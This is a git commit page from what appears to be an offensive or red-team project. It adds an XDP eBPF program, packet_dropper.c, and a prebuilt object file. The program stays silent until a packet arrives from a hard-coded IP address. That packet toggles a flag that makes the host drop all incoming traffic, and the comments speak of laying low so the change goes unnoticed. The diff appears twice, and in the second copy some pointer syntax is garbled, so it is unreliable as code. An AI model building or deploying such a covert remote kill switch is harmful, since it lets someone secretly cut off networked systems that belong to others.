modified readme and added packet_dropper files

author: Ryan Schanzenbacher <ryan@rschanz.org> 2023-02-16 23:33:17 -0500
committer: Ryan Schanzenbacher <ryan@rschanz.org> 2023-02-16 23:33:17 -0500
commit: 6c4c5f16b1beb599ba897956499469eeca86cfc8 (patch)
tree: ebec501b79bda94c9b656c2a1d3af3c61cda2ef9
parent: 23061bab189d3cfc7181ce68f4949304d91b3ce6 (diff)
3 files changed, 78 insertions, 1 deletions
diff --git a/README.md b/README.md
index 0e6d352..b523fb4 100644
--- a/README.md
+++ b/README.md
@@ -22,7 +22,7 @@ Now that the driver is loaded, it is active. Nothing will appear to have changed
 ### Build information
-You need the linux headers, libbpf headers, libxdp headers and clang. Once you have all of these installed, run the following command to build the object file that can be loaded:
+A prebuild version has been provided, however to build you can do the following. You need the linux headers, libbpf headers, libxdp headers and clang. Once you have all of these installed, run the following command to build the object file that can be loaded:
 ```
 clang -O2 -g -Wall -target bpf -c packet_dropper.c -o packet_dropper.o
diff --git a/packet_dropper.c b/packet_dropper.c
new file mode 100644
index 0000000..d0a8d85
--- /dev/null
+++ b/packet_dropper.c
@@ -0,0 +1,77 @@
+#include <linux/bpf.h>
+#include <bpf/bpf_helpers.h>
+#include <linux/if_ether.h>
+#include <linux/in.h>
+#include <linux/if_packet.h>
+#include <linux/ip.h>
+#include <linux/tcp.h>
+struct {
+        __uint(type, BPF_MAP_TYPE_ARRAY);
+        __type(key, __u32);
+        __type(value, __u32);
+        __uint(max_entries, 1);
+} status SEC(".maps");
+SEC("xdpentry")
+int entry(struct xdp_md *ctx) {
+        // Prepare some data structures
+        __u32 *rec;
+        __u32 key = 0;
+        void *data_end = (void *)(long)ctx->data_end;
+        void *data = (void *)(long)ctx->data;
+        struct ethhdr *eth = data;
+        rec = bpf_map_lookup_elem(&status, &key); // Lookup current packet status from kernel map
+        if (!rec) {
+                return XDP_DROP; // try to lay low on error
+        }
+        //bpf_printk("Rec: %u", *rec); // Debug prints
+        if ((*rec != 55) && (*rec != 56)) {
+                // First run check
+                // bpf_printk("Resetting rec!"); // Debug Prints
+                *rec = 56; // set default value for map
+        }
+        if (eth + 1 > data_end) // Bounds checking for xdp preverifier
+                return XDP_PASS; // This should never run normally
+        /** if(eth->h_proto != ETH_P_IP) {
+                return XDP_PASS; // don't kill layer 2 traffic
+        } **/
+        struct iphdr *iph = data + sizeof(struct ethhdr);
+        if (iph + 1 > data_end) // More bounds checking
+                return XDP_PASS; // This should never run either
+                                 //
+        __u32 ip_src = iph->saddr; // grab source address of packet
+        // bpf_printk("Incoming packet: %u\n", ip_src); // Debug print
+        // Determine if we need to further process this packet
+        if (ip_src == 1946091487) {
+                // This packet had a destination of 223.255.254.115, do something!
+                // bpf_printk("Got it!, setting rec..."); // Debug print
+                switch (*rec) {
+                        case 55 :
+                                *rec = 56;
+                                break;
+                        case 56 :
+                                *rec = 55;
+                                break;
+                }
+                return XDP_DROP;
+        }
+        else if (ip_src == 0) {
+                // most likely a layer 2 packet, let it thru
+                return XDP_PASS;
+        }
+        // Finish processing
+        if (*rec == 55) {
+                return XDP_DROP;
+        } else {
+                return XDP_PASS;
+        }
+}
+char _license[] SEC("license")= "GPL";
diff --git a/packet_dropper.o b/packet_dropper.o
new file mode 100644
index 0000000..3958484
--- /dev/null
+++ b/packet_dropper.o
Binary files differ
author	Ryan Schanzenbacher <ryan@rschanz.org>	2023-02-16 23:33:17 -0500
committer	Ryan Schanzenbacher <ryan@rschanz.org>	2023-02-16 23:33:17 -0500
commit	6c4c5f16b1beb599ba897956499469eeca86cfc8 (patch)
tree	ebec501b79bda94c9b656c2a1d3af3c61cda2ef9
parent	23061bab189d3cfc7181ce68f4949304d91b3ce6 (diff)

diff --git a/README.md b/README.md index 0e6d352..b523fb4 100644 --- a/README.md +++ b/README.md
@@ -22,7 +22,7 @@ Now that the driver is loaded, it is active. Nothing will appear to have changed
22		22
23	### Build information	23	### Build information
24		24
25	You need the linux headers, libbpf headers, libxdp headers and clang. Once you have all of these installed, run the following command to build the object file that can be loaded:	25	A prebuild version has been provided, however to build you can do the following. You need the linux headers, libbpf headers, libxdp headers and clang. Once you have all of these installed, run the following command to build the object file that can be loaded:
26		26
27	```	27	```
28	clang -O2 -g -Wall -target bpf -c packet_dropper.c -o packet_dropper.o	28	clang -O2 -g -Wall -target bpf -c packet_dropper.c -o packet_dropper.o


diff --git a/packet_dropper.c b/packet_dropper.c new file mode 100644 index 0000000..d0a8d85 --- /dev/null +++ b/packet_dropper.c
@@ -0,0 +1,77 @@
		1	#include <linux/bpf.h>
		2	#include <bpf/bpf_helpers.h>
		3	#include <linux/if_ether.h>
		4	#include <linux/in.h>
		5	#include <linux/if_packet.h>
		6	#include <linux/ip.h>
		7	#include <linux/tcp.h>
		8
		9	struct {
		10	__uint(type, BPF_MAP_TYPE_ARRAY);
		11	__type(key, __u32);
		12	__type(value, __u32);
		13	__uint(max_entries, 1);
		14	} status SEC(".maps");
		15
		16	SEC("xdpentry")
		17	int entry(struct xdp_md *ctx) {
		18	// Prepare some data structures
		19	__u32 *rec;
		20	__u32 key = 0;
		21	void data_end = (void )(long)ctx->data_end;
		22	void data = (void )(long)ctx->data;
		23	struct ethhdr *eth = data;
		24
		25	rec = bpf_map_lookup_elem(&status, &key); // Lookup current packet status from kernel map
		26	if (!rec) {
		27	return XDP_DROP; // try to lay low on error
		28	}
		29	//bpf_printk("Rec: %u", *rec); // Debug prints
		30	if ((rec != 55) && (rec != 56)) {
		31	// First run check
		32	// bpf_printk("Resetting rec!"); // Debug Prints
		33	*rec = 56; // set default value for map
		34	}
		35
		36	if (eth + 1 > data_end) // Bounds checking for xdp preverifier
		37	return XDP_PASS; // This should never run normally
		38
		39	/** if(eth->h_proto != ETH_P_IP) {
		40	return XDP_PASS; // don't kill layer 2 traffic
		41	} **/
		42
		43	struct iphdr *iph = data + sizeof(struct ethhdr);
		44	if (iph + 1 > data_end) // More bounds checking
		45	return XDP_PASS; // This should never run either
		46	//
		47	__u32 ip_src = iph->saddr; // grab source address of packet
		48	// bpf_printk("Incoming packet: %u\n", ip_src); // Debug print
		49	// Determine if we need to further process this packet
		50	if (ip_src == 1946091487) {
		51	// This packet had a destination of 223.255.254.115, do something!
		52	// bpf_printk("Got it!, setting rec..."); // Debug print
		53	switch (*rec) {
		54	case 55 :
		55	*rec = 56;
		56	break;
		57	case 56 :
		58	*rec = 55;
		59	break;
		60	}
		61	return XDP_DROP;
		62	}
		63	else if (ip_src == 0) {
		64	// most likely a layer 2 packet, let it thru
		65	return XDP_PASS;
		66	}
		67
		68	// Finish processing
		69	if (*rec == 55) {
		70	return XDP_DROP;
		71	} else {
		72	return XDP_PASS;
		73	}
		74	}
		75
		76
		77	char _license[] SEC("license")= "GPL";


diff --git a/packet_dropper.o b/packet_dropper.o new file mode 100644 index 0000000..3958484 --- /dev/null +++ b/packet_dropper.o
Binary files differ